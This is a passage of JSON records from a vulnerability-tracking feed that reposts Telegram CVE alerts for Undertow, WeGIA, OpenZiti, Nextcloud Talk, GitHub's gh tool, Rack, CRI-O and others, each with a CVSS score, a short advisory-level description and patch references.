https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "0f705146-2ca8-4047-b241-4924eeff4080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6883", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "5d309c0b-069a-4f80-b041-c235b2fc2fa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6508", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "6ac7d6d5-1cf6-445f-aa24-2fbd24c0869b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7735", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "2c4ac0af-9201-4a9a-85c9-c0e9214c70e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7736", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "b12f09e1-a96a-4a1e-8e0c-e8e8d852cbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7441", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. https://access.redhat.com/errata/RHSA-2024:7441\n5. https://access.redhat.com/errata/RHSA-2024:7442\n6. https://access.redhat.com/errata/RHSA-2024:7735\n7. https://access.redhat.com/errata/RHSA-2024:7736\n8. https://access.redhat.com/security/cve/CVE-2024-7885\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2305290", "creation_timestamp": "2025-03-03T14:29:55.000000Z"}, {"uuid": "1cc2d81f-3e2e-4cb6-9010-5dc0b748c083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RP6-4MQP-G4P8", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6228", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27419\n\ud83d\udd25 CVSS Score: 9.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H)\n\ud83d\udd39 Description: WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. A Denial of Service (DoS) vulnerability exists in WeGIA. This vulnerability allows any unauthenticated user to cause the server to become unresponsive by performing aggressive spidering. The vulnerability is caused by recursive crawling of dynamically generated URLs and insufficient handling of large volumes of requests. This vulnerability is fixed in 3.2.16.\n\ud83d\udccf Published: 2025-03-03T16:07:00.445Z\n\ud83d\udccf Modified: 2025-03-03T16:07:00.445Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9rp6-4mqp-g4p8\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/624ddfadb3fd8f8b30ad4f601b032a9bacc86a39", "creation_timestamp": "2025-03-03T16:30:32.000000Z"}, {"uuid": "04df6b48-4188-47eb-b0c6-192388de9a29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6508", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "70aa226d-c8f2-41cf-b6f5-2611fe6c28ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5143", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "8703544c-5887-4554-85ae-a5f25e5261ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5147", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "dbc94a26-b635-485e-83de-516ca29dd9b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6883", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "b7a4a01f-5ec5-4860-b776-6adcca0b72b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5144", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "aab987ed-b4e0-4db9-9d5c-f33699c8c04d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3P8-XWW6-WVQH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6238", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27417\n\ud83d\udd25 CVSS Score: 6.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the adicionar_status_atendido.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the status parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 3.2.16.\n\ud83d\udccf Published: 2025-03-03T16:01:25.506Z\n\ud83d\udccf Modified: 2025-03-03T16:01:25.506Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3p8-xww6-wvqh\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/0f2644bca2afbdfff21662c51a64679dfba8c2bd", "creation_timestamp": "2025-03-03T16:30:47.000000Z"}, {"uuid": "1f7b0a57-f874-4163-a32a-f3e81a08ad47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQXH-VFV5-8QJP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6268", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27501\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenZiti is a free and open source project focused on bringing zero trust to any application. An endpoint on the admin panel can be accessed without any form of authentication. This endpoint accepts a user-supplied URL parameter to connect to an OpenZiti Controller and performs a server-side request, resulting in a potential Server-Side Request Forgery (SSRF) vulnerability. The fixed version has moved the request to the external controller from the server side to the client side, thereby eliminating the identity of the node from being used to gain any additional permissions. This vulnerability is fixed in 3.7.1.\n\ud83d\udccf Published: 2025-03-03T18:33:19.670Z\n\ud83d\udccf Modified: 2025-03-03T19:10:02.275Z\n\ud83d\udd17 References:\n1. https://github.com/openziti/ziti-console/security/advisories/GHSA-fqxh-vfv5-8qjp", "creation_timestamp": "2025-03-03T19:31:05.000000Z"}, {"uuid": "ec568caa-456e-4515-b77f-66c1b6f3d6cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9HR-CQ65-9MJW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6258", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-30540\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud Talk is a chat, video &amp; audio call extension for Nextcloud. In affected versions a user that was added later to a conversation can use this information to get access to data that was deleted before they were added to the conversation. This issue has been patched in version 15.0.5 and it is recommended that users upgrad to 15.0.5. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2023-04-17T21:32:29.470Z\n\ud83d\udccf Modified: 2025-03-03T19:18:53.256Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-c9hr-cq65-9mjw\n2. https://github.com/nextcloud/spreed/pull/8985\n3. https://hackerone.com/reports/1894676", "creation_timestamp": "2025-03-03T19:30:50.000000Z"}, {"uuid": "3e8153b2-d908-46ba-8589-ed5a509fe0ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGW4-V983-MGP8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6263", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25204\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: `gh` is GitHub\u2019s official command line tool. Starting in version 2.49.0 and prior to version 2.67.0, under certain conditions, a bug in GitHub's Artifact Attestation cli tool `gh attestation verify` causes it to return a zero exit status when no attestations are present. This behavior is incorrect: When no attestations are present, `gh attestation verify` should return a non-zero exit status code, thereby signaling verification failure. An attacker can abuse this flaw to, for example, deploy malicious artifacts in any system that uses `gh attestation verify`'s exit codes to gatekeep deployments. Users are advised to update `gh` to patched version `v2.67.0` as soon as possible.\n\ud83d\udccf Published: 2025-02-14T16:38:29.038Z\n\ud83d\udccf Modified: 2025-03-03T19:13:28.888Z\n\ud83d\udd17 References:\n1. https://github.com/cli/cli/security/advisories/GHSA-fgw4-v983-mgp8\n2. https://github.com/cli/cli/issues/10418\n3. https://github.com/cli/cli/pull/10421", "creation_timestamp": "2025-03-03T19:30:58.000000Z"}, {"uuid": "ada3e419-f9d5-4587-903e-99cca5d7f77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CGQ-6MH2-7J6V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6370", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27111\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs unsanitised header values from the X-Sendfile-Type header. An attacker can exploit this by injecting escape sequences (such as newline characters) into the header, resulting in log injection. This vulnerability is fixed in 2.2.12, 3.0.13, and 3.1.11.\n\ud83d\udccf Published: 2025-03-04T15:26:55.377Z\n\ud83d\udccf Modified: 2025-03-04T15:26:55.377Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack/security/advisories/GHSA-8cgq-6mh2-7j6v\n2. https://github.com/rack/rack/commit/803aa221e8302719715e224f4476e438f2531a53\n3. https://github.com/rack/rack/commit/aeac570bb8080ca7b53b7f2e2f67498be7ebd30b\n4. https://github.com/rack/rack/commit/b13bc6bfc7506aca3478dc5ac1c2ec6fc53f82a3", "creation_timestamp": "2025-03-04T15:31:02.000000Z"}, {"uuid": "eaa5a227-a4bf-4eec-bc5f-1ef57317db44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1908", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6398", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8676\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.\n\ud83d\udccf Published: 2024-11-26T19:15:48.475Z\n\ud83d\udccf Modified: 2025-03-04T18:20:24.881Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:10826\n2. https://access.redhat.com/errata/RHSA-2025:0648\n3. https://access.redhat.com/errata/RHSA-2025:1908\n4. https://access.redhat.com/security/cve/CVE-2024-8676\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2313842", "creation_timestamp": "2025-03-04T18:32:39.000000Z"}, {"uuid": "ab6aadfa-180e-4598-87ed-09ac55f086ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496X-2JQF-HP7G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7054", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22451\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Kiwi TCMS is an open source test management system. In version 11.6 and prior, when users register new accounts and/or change passwords, there is no validation in place which would prevent them from picking an easy to guess password. This issue is resolved by providing defaults for the `AUTH_PASSWORD_VALIDATORS` configuration setting. As of version 11.7, the password can\u2019t be too similar to other personal information, must contain at least 10 characters, can\u2019t be a commonly used password, and can\u2019t be entirely numeric. As a workaround, an administrator may reset all passwords in Kiwi TCMS if they think a weak password may have been chosen. \n\ud83d\udccf Published: 2023-01-02T15:56:43.003Z\n\ud83d\udccf Modified: 2025-03-10T21:33:43.162Z\n\ud83d\udd17 References:\n1. https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-496x-2jqf-hp7g\n2. https://github.com/kiwitcms/Kiwi/commit/3759fb68aed36315cdde9fc573b2fe7c11544985\n3. https://huntr.dev/bounties/32a873c8-f605-4aae-9272-d80985ef2b73", "creation_timestamp": "2025-03-10T21:39:03.000000Z"}, {"uuid": "555130ee-93d9-44cf-a80d-aa1670fecf7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X9XV-R58P-QH86", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6404", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1969\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Improper request input validation in Temporary Elevated Access Management (TEAM) for AWS IAM Identity Center allows a user to modify a valid request and spoof an 